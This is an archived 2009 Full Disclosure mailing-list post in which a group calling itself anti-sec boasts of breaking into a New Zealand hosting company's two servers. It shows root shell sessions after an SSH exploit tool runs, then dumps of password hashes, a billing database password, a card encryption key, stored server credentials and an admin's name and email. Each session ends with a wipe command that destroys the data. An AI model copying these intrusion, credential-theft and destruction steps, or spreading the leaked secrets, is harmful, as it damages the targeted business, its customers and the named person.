Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

SSANZ - Server Systems Administration NZ.
From: srshaxsir () hushmail com
Date: Sat, 04 Jul 2009 12:07:30 +0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                       __  .__
        _____    _____/  |_|__|           ______ ____   ____
        \__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\
         / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___
        (____  /___|  /__| |__|         /____  >\___  >\___  >
             \/     \/                       \/     \/     \/

                                        Some of you have seen a lot of casualties lately in the
webhosting scene:
                                        hosting companies being wiped and rm'd at the expense of their
clients. While
                                        some of this is collateral damage, we're about to show you,
ladies and
                                        gentlemen, that sometimes you aren't pwned because of who you
host but what you
                                        say.

                                                Practice what you preach.

- - Why SSANZ?

Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against
that.


LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:

Logan of New Zealand. CEO of Server Systems Administration NZ.

Signature:
Server Systems Administration NZ | SSANZ
Got Hacked? | 24/7/365 Remote Emergency Support | Specialist
Server Management
Affordable Hosting :: Resellers, Shared & Dedicated Server Systems

Server Management $25 - Security & Hardening - $50
<http://www.webhostingtalk.com/showthread.php?t=857383>:


Server Management - $25 Per Month

- Full Management - Support, & 3rd Party Installs
- Monitoring - Included - up to 3 ports.
- Emergency Recovery


Server Security - $50

- Initial Scan & Report
- Security Hardening & Security Installs/tweaks.
- IDS, Security Monitoring & mod_sec configured.
- Finishing Security Scan & SSANZ Custom Scans.


Emergency Server Recovery - $150

- Recover Hacked Server Systems
- Recover deleted data
- ANTI-dDOS Services
- dDOS Investigation

Security Worries? Security Audits - 50% OFF
<http://www.webhostingtalk.com/showthread.php?t=859795>:

Get your site/server audited to ensure your business data is
secure before you become a statistic.

In the past 6 months, e-crime activity reports have increased by
45% due to the global economic recession.

What is involved in a Full Security Audit?

External Security

   * Scan for Shells/malicious scripts
   * Scan for vulnerable web content ( permissions, RFI's )
   * Scans for Vulnerable Server Services
   * Vulnerable Ports
   * Testing of TCP handling - dDOS test.
   * Scan for Vulnerable PHP scripts/mods.
   * Control Panel Security Audit ( external )
   * Multiple Unique SSANZ Custom Scans*


Internal Security

   * Permissions/Ownership(s) Review
   * Apache/Webserver Security
   * User Account Security & binaries access audit
   * Local RFI Exploits located/patched.
   * System Binary Security Audit
   * Firewall/IPTABLES Audit
   * Bruteforce detection test & audit
   * Root Access Authentication Audit
   * Local PHP Functions Audit
   * Control Panel Security Audit ( Internal )
   * Kernel Security Audit
   * Additional SSANZ Custom Scans/Audit*

We at anti-sec decided to give you a _FREE_ Full Security Audit!*

* `rm -rf /` is included.


anti-sec:~/pwn# ./map ssanz.net

        IP: 66.197.143.133 ( osiris.ssanz.net )
        WWW: Apache/2.2.11
        SSH: SSH-2.0-OpenSSH_4.3

        IP: 66.197.204.101 ( devil.ssanz.net )
        WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
        SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.143.133
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata
#1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::

sh-3.2# w
 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78,
10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 3008
drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
- -rw-------  1 root     root         957 Jun 13 07:24 .accesshash
- -rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
- -rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
- -rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
- -rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
- -rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
- -rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-
0.6.tar.gz
drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
- -rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
- -rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
- -rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
- -rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
drwx------  2 root     root        4096 Jun  1 13:54 .elinks
- -rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
- -rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
drwx------  3 root     root        4096 Jun  1 10:39 .gconf
drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
- -rw-r--r--  1 root     root      414870 Sep 23  2008 htop-
0.8.1.tar.gz
- -rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
- -rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
- -rw-r--r--  1 root     root        4246 Jun  1 10:39
install.log.syslog
drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
- -rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-
3.0.0.tar.gz
- -rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-
3.0.0.tar.gz.1
- -rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-
3.0.0.tar.gz.2
- -rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-
3.0.0.tar.gz.3
drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
- -rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
- -rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
- -rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
- -rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
- -rw-------  1 root     root        1024 Jun  7 19:50 .rnd
drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------  2 root     root        4096 Jun  2 06:41 .ssh
- -rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
- -rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups



sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c |
sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c
| sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d'
|sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL
ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -
j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -
j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-
iso
screen wget http://www.remote-exploit.org/cgi-
bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-
bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-
monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install

sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -
0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -
0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -
0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -
0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs ->
/usr/local/apache/domlogs/billing
- -rw-------   1 billing billing 87744924 Jun 14 12:33 backup-
6.14.2009_12-32-41_billing.tar.gz
- -rw-------   1 billing billing 92931478 Jun 28 02:08 backup-
6.28.2009_02-06-29_billing.tar.gz
- -rw-------   1 billing billing 84475934 Jun  3 06:33 backup-
6.3.2009_06-32-54_billing.tar.gz
- -rw-------   1 billing billing 42341015 May 31 21:42 backup-
billing9912.tar.gz
- -rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
- -rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
- -rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
- -rw-------   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
- -rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-
exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008
cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24
cpmove.psql.1243922290
- -rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
- -rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
- -rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
drwx------   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx------   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www ->
public_html
- -rw-r--r--   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/

sh-3.2# ls
admin                 banned.php             configuressl.php
domainchecker.php  init.php             logout.php
postinfo.html       templates        viewticket.php  whois.php
affiliates.php        billing                contact.php
downloads          installmingchowping  modules
_private            templates_c      _vti_bin
aff.php               cart.php               creditcard.php
downloads.php      knowledgebase.php    networkissues.php
register.php        tutorials.php    _vti_cnf
announcements.php     cgi-bin                dbconnect.php
htaccess.txt       lang                 networkissuesrss.php
serverstatus.php    upgrade          _vti_inf.html
announcementsrss.php  clientarea.php         display.php
images             libs                 order.php
status              upgrade.php      _vti_log
announcements.xml     configuration.php      dl.php
includes           link.php             passwordreminder.php
submitticket.php    viewemail.php    _vti_pvt
attachments           configuration.php.new  dologin.php
index.php          login.php            pipe
supporttickets.php  viewinvoice.php  _vti_txt

sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash =
"57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the current input
statement.

mysql> use billing_billing;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+----------------------------+
| Tables_in_billing_billing  |
+----------------------------+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from
tblservers;
+--------------+----------------+------------------+----------+-----
- --------------------------------------------------------------------
- -+
| name         | ipaddress      | hostname         | username |
password
     |
+--------------+----------------+------------------+----------+-----
- --------------------------------------------------------------------
- -+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    |
J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=
     |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     |
+V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF
8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     |
n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
     |
+--------------+----------------+------------------+----------+-----
- --------------------------------------------------------------------
- -+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from
tbladmins;
+-----------+----------+-----------------+----------+---------------
- -------------------+
| firstname | lastname | email           | username | password
                   |
+-----------+----------+-----------------+----------+---------------
- -------------------+
| Logan     | Douglas  | Logan () ssanz net | Admin    |
c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+---------------
- -------------------+
1 row in set (0.06 sec)

mysql> quit
Bye


sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup

sh-3.2# exit
exit

- -----------------------------------

osiris                  [ DOWN ]
devil                   [  UP  ]

- -----------------------------------

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

                [+] 0wn0wn - anti-sec group
                [+] Target: 66.197.204.101
                [+] SSH Port: 22

                [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1
SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::

sh-3.2# w
 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root   4096 Jul  4 04:06 .
drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
- -rw-------  1 root root    957 Jun 13 05:20 .accesshash
- -rw-------  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
- -rw-------  1 root root   7258 Jun 30 10:03 .bash_history
- -rw-r--r--  1 root root     24 Jan  6  2007 .bash_logout
- -rw-r--r--  1 root root    191 Jan  6  2007 .bash_profile
- -rw-r--r--  1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
- -rw-r--r--  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
- -rw-r--r--  1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx------  3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
- -rw-r--r--  1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
- -rw-r--r--  1 root root 431490 Jun  5 10:52 csf.tgz
- -rw-r--r--  1 root root    100 Jan  6  2007 .cshrc
drwx------  2 root root   4096 Jun 12 01:51 .elinks
- -rw-r--r--  1 root root     16 Jun 13 15:33 .forward
drwx------  3 root root   4096 Jun 11 23:59 .gconf
drwx------  2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
drwx------  2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
- -rw-r--r--  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
- -rw-r--r--  1 root root    561 Jun 12 23:31 .htoprc
- -rw-r--r--  1 root root   4239 Jun 12 00:01 install.log.syslog
drwx------  6 root root   4096 Jun 12 02:33 .MirrorSearch
- -rw-------  1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
- -rw-r--r--  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
- -rw-r--r--  1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
- -rw-------  1 root root   1024 Jun 12 02:50 .rnd
drwx------  3 root root   4096 Jun 12 02:41 .spamassassin
drwx------  2 root root   4096 Jun 22 09:11 .ssh
- -rw-r--r--  1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 |
sort | uniq -c | sort -n
[snip]
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/
i686/Fedora-11-i686-Live.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-netinst.iso

sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# exit
exit


- -----------------------------------

osiris                  [ DOWN ]
devil                   [ DOWN ]

- -----------------------------------

Once again, practice what you preach. Don't claim to be something
you're not.
Most importantly, don't go after us. We're not the problem. What
you say does
not align AT ALL with what you actually do with your servers.

Fix that first, you dig?

~ There will always be no way out.
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkpPG9IACgkQDJfdxdA7QInVBwP/TP20s4O20zQnZFdF3KkB/aLngSLR
0p2RiBIJyJQyx/rBJOb40xeuSDwZVPUBr/J8UqfjsbEM2h9BWyg+gTadJVrZug3zyPB9
tC0pnuPtAqvOyuPEImKJD57Pq2GbdcJzkOvoCUXI+9x/LwpZgBozoGQyEJXuxHN7MqBN
oWOwDvc=
=TXeA
-----END PGP SIGNATURE-----

--
Click to get information on owning your own franchise.  Great products.  Low entry cost.
 http://tagline.hushmail.com/fc/BLSrjkqkQjmFxedkpUXtNBu5X4VuOb8F8lzN1ZrBi4NXEJpjI6RmoL1hj8E/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • SSANZ - Server Systems Administration NZ. srshaxsir (Jul 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault